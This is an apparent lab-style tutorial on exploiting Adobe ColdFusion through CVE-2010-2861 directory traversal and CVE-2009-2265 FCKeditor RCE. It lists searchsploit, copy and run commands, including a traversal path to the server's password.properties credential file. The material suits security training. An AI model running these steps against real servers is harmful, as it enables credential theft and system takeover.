# ColdFusion Exploitation Guide

## 1. Overview of ColdFusion Vulnerabilities

ColdFusion is a Java-based web application development platform known for its CFML (ColdFusion Markup Language). However, several versions have been found vulnerable to severe exploits, including:

* **CVE-2010-2861 (Directory Traversal)** – Allows attackers to read arbitrary files by manipulating the locale parameter.
* **CVE-2009-2265 (Unauthenticated RCE)** – Permits unauthenticated file uploads, leading to Remote Code Execution (RCE) through the FCKeditor package.

***

## 2. Exploitation Techniques

### 2.1 Directory Traversal Exploit (CVE-2010-2861)

**Objective:** Read arbitrary files from the ColdFusion server.

#### Steps:

1. **Search for available exploits**

   ```bash
   searchsploit adobe coldfusion
   searchsploit -p 14641
   ```
2. **Copy the exploit script to the working directory**

   ```bash
   cp /usr/share/exploitdb/exploits/multiple/remote/14641.py .
   ```
3. **Execute the script**

   ```bash
   python2 14641.py <target_ip> <target_port> <file_path>
   ```

**Example Usage:**

```bash
python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
```

***

### 2.2 Unauthenticated Remote Code Execution (CVE-2009-2265)

**Objective:** Gain remote code execution by exploiting a vulnerability in ColdFusion’s FCKeditor package.

#### Steps:

1. **Search for the exploit**

   ```bash
   searchsploit -p 50057
   ```
2. **Copy the exploit script**

   ```bash
   cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
   ```
3. **Modify the script** – Update local and remote IP addresses and ports.
4. **Execute the exploit**

   ```bash
   python3 50057.py
   ```

***

## 3. Commands Summary

### 3.1 SearchSploit Usage

```bash
searchsploit adobe coldfusion
searchsploit -p 14641
searchsploit -p 50057
```

### 3.2 File Manipulation

```bash
cp /usr/share/exploitdb/exploits/multiple/remote/14641.py .
cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
```

### 3.3 Exploit Execution

```bash
python2 14641.py <target_ip> <target_port> <file_path>
python3 50057.py
```

***

## 4. Key Takeaways

* **SearchSploit** is a useful tool for identifying known vulnerabilities and exploits.
* **Directory traversal** can allow unauthorized access to sensitive files.
* **Unauthenticated RCE** can lead to full system compromise.
* Always modify exploit scripts to fit your target’s IP and port.
* **Responsible and ethical hacking is critical** – never exploit systems without permission.